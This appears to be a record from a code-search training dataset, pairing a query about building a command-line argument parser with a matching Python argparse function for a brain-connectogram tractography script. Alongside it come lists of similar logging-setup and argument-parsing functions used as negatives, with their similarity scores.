print((\"{0}: {1} - {2}\".format(now.strftime(\"%Y-%m-%d %I:%M:%S %p\"), severity, message)))\n return", "def init_logging(to_file=False, filename=None):\n if to_file:\n if filename is None:\n filename = timestamp() + '.log'\n logging.basicConfig(level=logging.INFO, format='%(message)s', filename=filename)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout)) # write to stdout + file\n print('Logging to:', filename)\n else:\n logging.basicConfig(level=logging.INFO, format='%(message)s')", "def setlogger(filename):\n if debug:\n root = logging.getLogger()\n hdlr_file = logging.FileHandler(filename)\n fmt = logging.Formatter('%(name)-4s %(levelname)-7s %(message)s')\n hdlr_file.setFormatter(fmt)\n root.addHandler(hdlr_file)\n root.setLevel(logging.DEBUG)", "def setup_logging(level: int = logging.INFO) -> logging.Logger:\n log = logging.getLogger(__name__)\n console = logging.StreamHandler()\n log.addHandler(console)\n log.setLevel(level)\n return log", "def _setup_cmd_logger():\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = ColoredFormatter('%(log_color)s[%(levelname)8s] %(message)s%(reset)s')\n ch.setLevel(level=logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)", "def create_logger(logging, tool_name, level):\n logger = logging.getLogger(tool_name)\n\n # Create handlers\n handler = logging.StreamHandler()\n handler.setLevel(level)\n\n # Create formatters and add it to handlers\n logformat = logging.Formatter(\n '[%(name)s - %(asctime)s] %(levelname)s: %(message)s')\n handler.setFormatter(logformat)\n\n # Add handlers to the logger\n logger.addHandler(handler)\n logger.setLevel(level)\n\n return logger", "def __init_logging(self):\n\n logger = logging.getLogger('__name__')\n if os.path.exists(constants.LOG_FILE):\n logger.setLevel(logging.DEBUG)\n logger_file_handler = logging.FileHandler(constants.LOG_FILE)\n logger_formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')\n logger_file_handler.setFormatter(logger_formatter)\n logger.addHandler(logger_file_handler)\n else:\n logger.disabled = True", "def _create_logger(title, log_msg_id=\"\", log_file_suffix=\".log\"):\n\n logging.setLoggerClass(SkidlLogger)\n logger = logging.getLogger(title)\n\n # Errors & warnings always appear on the terminal.\n handler = logging.StreamHandler(sys.stderr)\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Errors and warnings are stored in a log file with the top-level script's name.\n handler = SkidlLogFileHandler(get_script_name() + log_file_suffix, mode=\"w\")\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Set logger to trigger on info, warning, and error messages.\n logger.setLevel(logging.INFO)\n\n # Augment the logger's functions to count the number of errors and warnings.\n logger.error = CountCalls(logger.error)\n logger.warning = CountCalls(logger.warning)\n\n return logger", "def main():\n logger = setup_logger()\n\n logger.debug('a debug message')\n logger.info('an info message')\n logger.warning('a warning message')\n logger.error('an error message')\n logger.critical('a critical message')", "def SetupLogging(level=logging.WARNING, log_file_name=None):\n logging.basicConfig(\n format='%(levelname)-8s %(asctime)-8s %(message)s',\n datefmt='%H:%M:%S',\n level=level,\n **({'filename': log_file_name} if log_file_name else {}))\n logging.Formatter.converter = time.gmtime\n logging.info(time.strftime('%Y.%m.%d %Z', time.gmtime()))", "def setupLogging():\n global enabled, dummyInstance\n from pyemma.util.config import conf_values\n args = conf_values['Logging']\n\n if args.enabled:\n if args.tofile and args.file:\n filename = args.file\n else:\n filename = None\n try:\n logging.basicConfig(level=args.level,\n format=args.format,\n datefmt='%d-%m-%y %H:%M:%S',\n filename=filename,\n filemode='a')\n except IOError as ie:\n import warnings\n warnings.warn('logging could not be initialized, because of %s' % ie)\n return\n \"\"\" in case we want to log to both file and stream, add a separate handler\"\"\"\n if args.toconsole and args.tofile:\n ch = logging.StreamHandler()\n ch.setLevel(args.level)\n ch.setFormatter(logging.Formatter(args.format))\n logging.getLogger('').addHandler(ch)\n else:\n dummyInstance = dummyLogger()\n\n enabled = args.enabled", "def initialize_logger(name, add_file_handler = True):\n # Load the default logger configuration.\n logger_config = {'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '[%(asctime)s] - %(levelname)s - %(name)s >>> %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S'}},\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'INFO',\n 'formatter': 'simple',\n 'stream': 'ext://sys.stdout'}},\n 'root': {'level': 'DEBUG',\n 'handlers': ['console']}}\n\n logging_config.dictConfig(logger_config)\n\n # Create the Logger, set its label and logging level.\n logger = logging.getLogger(name=name)\n\n # Add file handler - when the file is initialized...\n if add_file_handler:\n add_file_handler_to_logger(logger)\n\n # Set logger level depending on the settings.\n if AppState().args is not None and AppState().args.log_level is not None:\n logger.setLevel(getattr(logging, AppState().args.log_level.upper(), None))\n else:\n logger.setLevel('INFO')\n\n return logger", "def _get_logger(title, verbose_lvl):\n\n logger = logging.getLogger(title)\n console = logging.StreamHandler()\n\n if verbose_lvl == 1:\n logger.setLevel(logging.INFO)\n console.setLevel(logging.INFO)\n elif verbose_lvl == 2:\n logger.setLevel(logging.DEBUG)\n console.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.WARNING)\n console.setLevel(logging.WARNING)\n\n fmt = logging.Formatter(\n '%(asctime)s %(name)s %(levelname)s %(message)s')\n console.setFormatter(fmt)\n logger.addHandler(console)\n\n return logger", "def setup_logging(debug=False):\n today = date.today()\n logfile = \"{:04}-{:02}-{:02}-classperf.log\".format(\n today.year, today.month, today.day\n )\n\n teelogger = getLogger(\"opengever-time-layers\")\n formatter = Formatter(\"\")\n\n filehandler = FileHandler(logfile, mode=\"w\")\n filehandler.setFormatter(formatter)\n\n stdouthandler = StreamHandler(stream=stdout)\n stdouthandler.setFormatter(formatter)\n\n if debug:\n teelogger.setLevel(DEBUG)\n else:\n teelogger.setLevel(INFO)\n\n teelogger.addHandler(filehandler)\n teelogger.addHandler(stdouthandler)\n\n return teelogger", "def my_custom_logger(logger_name, level=logging.INFO):\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n format_string = ('%(asctime)s, %(levelname)s, %(filename)s, %(message)s')\n log_format = logging.Formatter(format_string)\n # Creating and adding the console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_format)\n logger.addHandler(console_handler)\n # Creating and adding the file handler\n file_handler = logging.FileHandler(logger_name, mode='a')\n file_handler.setFormatter(log_format)\n logger.addHandler(file_handler)\n return logger", "def initLogging ( logFile ):\n logging.basicConfig(\n filename=logFile,\n level=logging.INFO,\n format='%(asctime)s %(levelname)-8s %(message)s',\n filemode='w'\n )", "def _setup_std_logging (logger, log_file, verbose):\n class debug_filter(logging.Filter):\n \"\"\"\n Ignore INFO messages\n \"\"\"\n def filter(self, record):\n return logging.INFO != record.levelno\n\n class NullHandler(logging.Handler):\n \"\"\"\n for when there is no logging\n \"\"\"\n def emit(self, record):\n pass\n\n # We are interesting in all messages\n logger.setLevel(logging.DEBUG)\n has_handler = False\n\n # log to file if that is specified\n if log_file:\n handler = logging.FileHandler(log_file, delay=False)\n handler.setFormatter(logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)6s - %(message)s\"))\n handler.setLevel(MESSAGE)\n logger.addHandler(handler)\n has_handler = True\n\n # log to stderr if verbose\n if verbose:\n stderrhandler = logging.StreamHandler(sys.stderr)\n stderrhandler.setFormatter(logging.Formatter(\" %(message)s\"))\n stderrhandler.setLevel(logging.DEBUG)\n if log_file:\n stderrhandler.addFilter(debug_filter())\n logger.addHandler(stderrhandler)\n has_handler = True\n\n # no logging\n if not has_handler:\n logger.addHandler(NullHandler())", "def setup_logging(module=None, level=logging.INFO): # pragma: no cover\n logger = logging.getLogger(module or '')\n logger.setLevel(level)\n logging.Formatter.converter = time.gmtime\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(processName)s - %(levelname)s - %(message)s'\n )\n stream_handler = logging.StreamHandler(sys.stderr)\n stream_handler.setLevel(level)\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n return logger", "def create_logger(app_name: str) -> logging.Logger:\n if not os.path.exists(os.path.join(os.getcwd(), 'logs')):\n os.mkdir(os.path.join(os.getcwd(), 'logs'))\n\n app_logfile = os.path.join(os.getcwd(), 'logs', f'{app_name}.log')\n\n logger = logging.getLogger(f\"{app_name}-logger\")\n logger.setLevel(logging.DEBUG)\n\n handler = logging.handlers.RotatingFileHandler(filename=app_logfile, mode='a', maxBytes=20000, backupCount=10)\n handler.setLevel(logging.DEBUG)\n\n # Set the formatter\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n\n # Set it as the base handler\n logger.base_handler = handler\n\n # Also add a newline handler to switch to later\n newline_handler = logging.FileHandler(filename=app_logfile, mode='a')\n newline_handler.setLevel(logging.DEBUG)\n newline_handler.setFormatter(logging.Formatter(fmt='')) # Must be an empty format\n \n logger.newline_handler = newline_handler\n\n # Also add the provision for a newline handler using a custom method attribute\n logger.newline = types.MethodType(add_newlines, logger)\n\n # Also add a StreamHandler for printing to stderr\n console_handler = logging.StreamHandler()\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n console_handler.setFormatter(formatter)\n \n logger.addHandler(console_handler)\n\n return logger", "def initialize_logger(self):\n\n # initialize logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n # logger console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(logging.Formatter(\"\"))\n logger.addHandler(console_handler)", "def initialize_logger(filename=None, level=logging.DEBUG, filemode='w'):\n log_format = '%(asctime)s %(levelname)s\\n' + \\\n ' %(filename)s:%(lineno)s: %(name)s %(message)s'\n\n if filename is None:\n handler = logging.StreamHandler()\n else:\n handler = logging.handlers.RotatingFileHandler(\n filename=filename, mode=filemode)\n\n handler.setFormatter(logging.Formatter(log_format))\n logger = logging.getLogger('LOG')\n logger.addHandler(handler)\n logger.setLevel(level)\n\n return logger, handler", "def __create_logger(who, level):\n global loggers\n global toconsole\n global LEVELS\n global console\n global logfile\n loggers[who] = logging.getLogger(who)\n loggers[who].setLevel(level)\n format = logging.Formatter(\"%(asctime)s - %(name)s - \"\\\n \"%(levelname)s - %(message)s\")\n if (toconsole):\n if (console == None):\n console = logging.StreamHandler()\n console.setFormatter(format)\n loggers[who].addHandler(console)\n else:\n if (logfile == None):\n logfile = logging.handlers.RotatingFileHandler('/var/log/yapc.log',\n maxBytes=10485760,\n backupCount=10)\n logfile.setFormatter(format)\n loggers[who].addHandler(logfile)\n loggers[GENERIC_LOG_NAME].log(LEVELS[\"VDBG\"],\n \"Add logger for \"+who+\" at level \"+str(level))", "def configure_py_log(directory=None, filename=sys.argv[0], mode=\"w\"):\n if directory is None:\n logging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )\n else:\n logging.basicConfig(\n filename=os.path.join(directory, filename),\n filemode=mode,\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )", "def _logger(self):\n logger = logging.getLogger(self.NAME)\n logger.setLevel(self.LOG_LEVEL)\n shandler = logging.StreamHandler(sys.stdout)\n fmt = '\\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():'\n fmt += '%(lineno)d %(asctime)s\\033[0m| %(message)s'\n shandler.setFormatter(logging.Formatter(fmt))\n logger.addHandler(shandler)\n return logger" ]
[ "0.7268376", "0.70308805", "0.7029211", "0.7027607", "0.6950778", "0.6924888", "0.6906252", "0.6870268", "0.6851774", "0.68211913", "0.6813843", "0.6808933", "0.68085176", "0.6753689", "0.67525923", "0.6736932", "0.67316926", "0.67220473", "0.67183745", "0.6701308", "0.6691116", "0.66806465", "0.66781086", "0.6653156", "0.66483897", "0.6647405", "0.6645173", "0.6641966", "0.66297245", "0.66241837", "0.6617823", "0.6614719", "0.6592336", "0.6581851", "0.658022", "0.6576932", "0.6569667", "0.6567263", "0.65653235", "0.65451866", "0.65181166", "0.6517757", "0.65120286", "0.65120286", "0.65120286", "0.65120286", "0.65048116", "0.6487694", "0.6486355", "0.64861864", "0.6484511", "0.6477887", "0.6473358", "0.6466693", "0.64628655", "0.645347", "0.64518106", "0.64304644", "0.64294565", "0.64291346", "0.64175814", "0.6409891", "0.6400956", "0.63897", "0.6381571", "0.6380249", "0.63721997", "0.636858", "0.6367548", "0.6367443", "0.6366547", "0.63664377", "0.63643515", "0.63587314", "0.6349357", "0.63492733", "0.6344795", "0.63432163", "0.63361645", "0.6328344", "0.6326782", "0.63252485", "0.6324357", "0.6323715", "0.6321257", "0.6313704", "0.6308728", "0.6307855", "0.63001937", "0.629928", "0.62912065", "0.6288676", "0.6284829", "0.6269904", "0.62686443", "0.62668264", "0.62610054", "0.6257352", "0.625634", "0.6251679" ]
0.65178096
41
Create a command line argument parser, run it and return a dict mapping > .
def get_cmd_line_args(): usage = "%(prog)s <subject id> <nodif_brain> <bedpostx_dir> <outdir> [options]" parser = argparse.ArgumentParser(prog = "python probabilist_connectogram.py", usage = usage) # Required arguments parser.add_argument("subject_id", help="The name of the subject's folder in <SUBJECTS_DIR>.") parser.add_argument("nodif_brain", help="A preprocessed brain-only volume with bvalue=0.") parser.add_argument("bedpostx_dir", help="The bedpostx output directory for the subject's DWI data.") parser.add_argument("outdir", help="Directory where to output.") # Optional arguments parser.add_argument("--cortical-atlas", default="Desikan", choices=["Desikan", "Destrieux"], metavar="<atlas name>", help="Cortical atlas name, 'Desikan' (default) or 'Destrieux'") parser.add_argument("--remove-subcortical", action="store_true", help="Remove subcortical regions from the connectogram " "(Thalamus, Caudate, Putamen, Pallidum, Hippocampus, " "Amygdala, Accumbens-area and VentralDC).") parser.add_argument("--tracto-mask-type", default="nodif_brain", choices=TractoMaskTypes.choices, metavar="<tracto mask type>", help='The type of tractography mask to create, allowed types: ' '"nodif_brain" (default, whole brain), "wm", ' '"wm_dilated_1vox_6conn" or "wm_dilated_1vox_14conn". ' 'Two of the proposed white matter masks are dilated because a ' 'non-dilated white matter mask does not overlap with the "gray" ' 'subcortical regions, therefore the samples will never get there. ' 'Moreover the right and left white matter regions are much less ' 'connected without dilation, therefore the connectogram shows ' 'few interhemisphere connections with a simple white matter mask. ' '"wm_dilated_1vox_6conn" means white matter dilated by 1 voxel ' 'based one a 6-connexity structuring element.') parser.add_argument("--nsamples", type=int, default=5000, metavar="<nsamples>", help="Number of samples per voxel to initiate in seed " "region (default 5000).") parser.add_argument("--nsteps", type=int, default=2000, metavar="<nsteps>", help="Maximum number of steps for a sample (default 2000).") parser.add_argument("--fs-subjects-dir", metavar="<Freesurfer subjects directory>", help="To bypass the $SUBJECTS_DIR environment variable.") # Create a dict of arguments to pass to the 'main' function args = parser.parse_args() kwargs = vars(args) # Adapt one argument to the 'main' interface kwargs["add_subcortical"] = not kwargs["remove_subcortical"] del kwargs["remove_subcortical"] return kwargs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main_parse_args():\n parser = ArgumentParser()\n parser.add_argument('infile', help='path to the file to be mapped.It should\\\n contain one identifer on each line.')\n parser.add_argument('-rh', '--redis_host', default=DEFAULT_REDIS_URL,\n help='url of Redis db')\n parser.add_argument('-rp', '--redis_port', default=DEFAULT_REDIS_PORT,\n help='port for Redis db')\n parser.add_argument('-rps', '--redis_pass', default=DEFAULT_REDIS_PASS,\n help='password for Redis db')\n parser.add_argument('-of', '--outfile', default=None,\n help='path to the output file')\n parser.add_argument('-sh', '--source_hint', help='suggestion for ID source \\\n database used to resolve ambiguities in mapping',\n default=DEFAULT_HINT)\n parser.add_argument('-t', '--taxon', help='taxon id of species of all gene \\\n names', default=DEFAULT_TAXON)\n myargs = parser.parse_args()\n return myargs", "def retrieve_args_dict():\n process_args = sys.argv[1:]\n dictionary = dict()\n for process_arg in process_args:\n splitted = process_arg.split(\":\")\n if len(splitted) > 1:\n key = splitted[0]\n value = \"\".join(splitted[1:])\n dictionary[key] = value\n return dictionary", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def crude_arg_parser(args=sys.argv):\n args_dict = {}\n key = None\n for e in args[1:]:\n if e[:2] == '--':\n if key:\n args_dict[key] = True # Switch arg\n key = e[2:]\n elif key:\n args_dict[key] = e\n key = None\n\n return args_dict", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--urls_dirpath', type=unicode)\n parser.add_argument('-r', '--resources_dir', type=unicode)\n parser.add_argument('-t', '--total_docs', type=int)\n parser.add_argument('-m', '--mapping', type=unicode,\n help='File with the yago to lkif mapping')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"\"\"\n Generates json files with all the combinations of\n hyperparameter values from a configuratio file.\n \"\"\")\n\n parser.add_argument('outdir', help='output directory')\n parser.add_argument('config', help='configuration file')\n\n return parser.parse_args()", "def parse_arguments(args: list = None) -> Dict[str, str]:\n arg_parser = argparse.ArgumentParser(description=\"Console command to crypt \"\n \"and decrypt texts using \"\n \"classic methods. It also \"\n \"performs crypto attacks \"\n \"against those methods.\\n\",\n epilog=\"Follow cifra development at: \"\n \"<https://github.com/dante-signal31/cifra>\")\n cifra_subparsers = arg_parser.add_subparsers(help=\"Available modes\",\n dest=\"mode\",\n required=True)\n # DICTIONARY MANAGEMENT.\n dictionary_parser = cifra_subparsers.add_parser(name=\"dictionary\",\n help=\"Manage dictionaries to \"\n \"perform crypto attacks.\")\n dictionary_actions_subparser = dictionary_parser.add_subparsers(help=\"Action to perform.\",\n dest=\"action\")\n # DICTIONARY CREATION.\n dictionary_create_parser = dictionary_actions_subparser.add_parser(name=\"create\",\n help=\"Create a dictionary of unique words.\")\n dictionary_create_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to create.\",\n metavar=\"NEW_DICTIONARY_NAME\")\n dictionary_create_parser.add_argument(\"-i\", \"--initial_words_file\",\n type=_check_is_file,\n help=\"Optionally you can load in the dictionary words located in a text file\",\n metavar=\"PATH_TO FILE_WITH_WORDS\")\n # DICTIONARY REMOVAL.\n dictionary_delete_parser = dictionary_actions_subparser.add_parser(name=\"delete\",\n help=\"Remove an existing dictionary.\")\n dictionary_delete_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to delete.\",\n metavar=\"DICTIONARY_NAME_TO_DELETE\")\n # DICTIONARY UPDATING.\n dictionary_update_parser = dictionary_actions_subparser.add_parser(name=\"update\",\n help=\"Add words to an existing dictionary.\")\n dictionary_update_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to update with additional words.\",\n metavar=\"DICTIONARY_NAME_TO_UPDATE\")\n dictionary_update_parser.add_argument(\"words_file\",\n type=_check_is_file,\n help=\"Pathname to a file with words to add to dictionary\",\n metavar=\"PATH_TO_FILE_WITH_WORDS\")\n # DICTIONARY LISTING.\n _ = dictionary_actions_subparser.add_parser(name=\"list\",\n help=\"Show existing dictionaries.\")\n # CIPHER MANAGEMENT.\n cipher_parser = cifra_subparsers.add_parser(name=\"cipher\",\n help=\"Cipher a text using a key.\")\n cipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to cipher.\",\n metavar=\"ALGORITHM_NAME\")\n cipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to cipher.\",\n metavar=\"CIPHERING_KEY\")\n cipher_parser.add_argument(\"file_to_cipher\",\n type=_check_is_file,\n help=\"Path to file with text to cipher.\",\n metavar=\"FILE_TO_CIPHER\")\n cipher_parser.add_argument(\"-o\", \"--ciphered_file\",\n type=str,\n help=\"Path to output file to place ciphered text. If not used then\"\n \"ciphered text will be dumped to console.\",\n metavar=\"OUTPUT_CIPHERED_FILE\")\n cipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # DECIPHERING MANAGEMENT\n decipher_parser = cifra_subparsers.add_parser(name=\"decipher\",\n help=\"Decipher a text using a key.\")\n decipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to decipher.\",\n metavar=\"ALGORITHM_NAME\")\n decipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to decipher.\",\n metavar=\"CIPHERING_KEY\")\n decipher_parser.add_argument(\"file_to_decipher\",\n type=_check_is_file,\n help=\"Path to file with text to decipher.\",\n metavar=\"FILE_TO_DECIPHER\")\n decipher_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n decipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # ATTACK MANAGEMENT\n attack_parser = cifra_subparsers.add_parser(name=\"attack\",\n help=\"Attack a ciphered text to get its plain text\")\n attack_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to attack.\",\n metavar=\"ALGORITHM_NAME\")\n attack_parser.add_argument(\"file_to_attack\",\n type=_check_is_file,\n help=\"Path to file with text to attack.\",\n metavar=\"FILE_TO_ATTACK\")\n attack_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n attack_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n\n parsed_arguments = vars(arg_parser.parse_args(args))\n filtered_parser_arguments = {key: value for key, value in parsed_arguments.items()\n if value is not None}\n return filtered_parser_arguments", "def command_line_parse(iargs=None):\n\n parser = create_parser()\n inps = parser.parse_args(args=iargs)\n\n return inps", "def parse_args():\n parser = argparse.ArgumentParser(description=\"evaluate the recovered derg by comparing with ground truth mapping file\")\n parser.add_argument(\"-mapping\", action=\"store\", dest=\"mapping_file\",\n required=True, help=\"path to proguard-generated mapping.txt\")\n parser.add_argument(\"-recovered_derg\", action=\"store\", dest=\"recovered_derg\",\n required=True, help=\"path to recovered derg\")\n parser.add_argument(\"-nice2predict_mapping\", action=\"store\", dest=\"nice2predict_mapping_file\",\n help=\"path to nice2predict-generated mapping.txt\")\n parser.add_argument(\"-o\", action=\"store\", dest=\"report_dir\",\n default=\".\", help=\"directory of report files\")\n parser.add_argument(\"-report_name\", action=\"store\", dest=\"report_name\",\n default=DEFAULT_REPORT_NAME, help=\"name of report file\")\n parser.add_argument(\"-match_mode\", action=\"store\", dest=\"match_mode\",\n default=MATCH_MODE_EXACT, help=\"match mode\")\n\n options = parser.parse_args()\n print options\n return options", "def parse_arguments(args):", "def _parse_args():\n parser = argparse.ArgumentParser(description='Run DAFI.')\n parser.add_argument('input_file', help='Name (path) of input file')\n return parser.parse_args()", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def parse_args():\n\tparser = argparse.ArgumentParser(description=\"comparing proguard-generated and predict mappings\")\n\tparser.add_argument(\"--proguard\", action=\"store\", dest=\"proguard_mappings_dir\",\n\t\t\t\t\t\trequired=True, help=\"directory of proguard-generated mappings file\")\n\tparser.add_argument(\"--predict\", action=\"store\", dest=\"predict_mappings_dir\",\n\t\t\t\t\t\trequired=True, help=\"directory of predict mappings file\")\n\tparser.add_argument(\"-o\", action=\"store\", dest=\"report_path\",\n\t\t\t\t\t\trequired=True, help=\"directory of report file\")\n\n\toptions = parser.parse_args()\n\tprint options\n\treturn options", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Create timezone info JSON file from tzdata files\")\n parser.add_argument(\"-v\", \"--vzic\", dest=\"vzic_path\", required=True,\n help=\"\"\"Path to the `vzic` executable. This must be\n downloaded from https://code.google.com/p/tzurl/ and\n compiled.\"\"\")\n parser.add_argument(\"-t\", \"--tzdata\", dest=\"tzdata_path\",\n help=\"\"\"Path to a directory containing the IANA\n timezone data. If this argument is omitted, the data\n will be downloaded from ftp.iana.org.\"\"\")\n return parser.parse_args()", "def _get_args(self):\n parser = ArgumentParser(\n description=\"Dynamically generates Snakefiles for data \"\n \"integration and machine learning pipelines.\"\n )\n\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=(\n \"Configuration filepath. (Will look for file named config.yml \"\n \"in current working directory, if none specified.)\"\n ),\n )\n\n parser.add_argument(\n \"-r\",\n \"--run\",\n default=False,\n help=(\n \"Runs pipeline, in addition to generating Snakefile.\"\n ),\n )\n\n # convert command-line args to a dict and return\n args = parser.parse_args()\n\n args = dict(\n (k, v) for k, v in list(vars(args).items()) if v is not None\n )\n\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description='Convert environment variables in to a configuration file')\n parser.add_argument('-p',\n '--prefix',\n help='Prefix of env vars to parse',\n required=True)\n parser.add_argument('-f',\n '--format',\n help='Output file format',\n default='ini',\n choices=['ini', 'json'])\n parser.add_argument('-o',\n '--output-file',\n help='Outfile file path',\n default='/dev/stdout')\n parser.add_argument(\n '-r',\n '--reference-file',\n type=argparse.FileType('r'),\n help='Load this reference file for existing/hard coded values')\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser(prog='scoring')\n parser.add_argument(\"pdb_list\", help=\"list of PDB structures\")\n script_args = parser.parse_args()\n return script_args", "def parse_arguments():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--accessions\", help=\"A json file with old/new family mapppings\")\n parser.add_argument(\"--add-header\", help=\"Print descriptive header\",\n action=\"store_true\", default=False)\n parser.add_argument(\"--add-links\", help=\"Creates hyperlinks to available Rfam html content\",\n action=\"store_true\", default=False)\n return parser", "def arg_parse():\n p = ap.ArgumentParser()\n p.add_argument()\n return p.parse_args()", "def parse_arguments():\n\n args = Arguments()\n parser = argparse.ArgumentParser(\"Update river flow directions\")\n parser.add_argument('python_config_filename',\n metavar='python-config-filename',\n help='Full path to python configuration file',\n type=str)\n #Adding the variables to a namespace other than that of the parser keeps the namespace clean\n #and allows us to pass it directly to main\n parser.parse_args(namespace=args)\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def main():\n args = parse_args()\n process_args(args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--zarr_dir',\n type=str,\n help='path to directory of zarr files',\n )\n parser.add_argument(\n '--tiff_dir',\n type=str,\n help='path to directory of tiff files',\n )\n parser.add_argument(\n '--output_dir',\n type=str,\n help='path to directory for writing',\n )\n parser.add_argument(\n '--config_path',\n type=str,\n default=None,\n help='path to yaml preprocess config file',\n )\n \n args = parser.parse_args()\n return args", "def arg_parse():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\",\n \"--fpath\",\n type=str,\n required=True,\n help=\"Path to files to generate test data from e.g. /badc/cmip5/data/cmip5/output1/MOHC/HadGEM2-ES/rcp85/mon/atmos/Amon/r1i1p1/latest/tas\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--time_only\",\n default=False,\n help=\"Only generate one time step of this dataset\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--step\",\n type=int,\n default=100,\n help=\"Step to select latitude/longitude by. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--number\",\n type=int,\n default=0,\n help=\"Number of files to generate. Default is all files. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--level\",\n type=int,\n default=-1,\n help=\"Number of levels to extract, starting with index 0.\",\n )\n\n parser.add_argument(\n \"-c\", \"--compress\", help=\"Compress the files.\", action=\"store_true\"\n )\n\n return parser.parse_args()", "def parseCommandLine(argv):\n parameters = {}\n for p in argv[1:]: # skip 0th element (module name)\n pair = split(p, '=', 1)\n if (2 != len(pair)):\n print 'bad parameter: %s (had no equals sign for pairing)' % p\n sys.exit()\n else:\n parameters[pair[0]] = pair[1]\n return parameters", "def parse_args():\n parser = argparse.ArgumentParser(description='Create a database server to save and return key pair values')\n parser.add_argument('--ip', type=str, required=False, default='localhost', help='IP for server to listen on')\n parser.add_argument('--port', type=int, required=False, default=4000, help='Port for server to listen on')\n\n return parser.parse_args()", "def parse_command_line(argv):\n import argparse\n parser = 